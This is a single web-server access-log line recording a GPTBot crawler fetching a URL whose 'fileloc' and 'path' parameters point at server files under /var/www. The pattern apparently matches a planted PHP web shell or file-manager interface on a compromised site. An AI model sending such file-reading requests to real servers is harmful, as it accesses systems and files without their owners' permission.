74.7.227.215 - - [16/Nov/2025:00:03:46 +0000] "GET /q-~143lJNlfySrhHDuBCZqhMeQYUcsSLdWPd40830/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
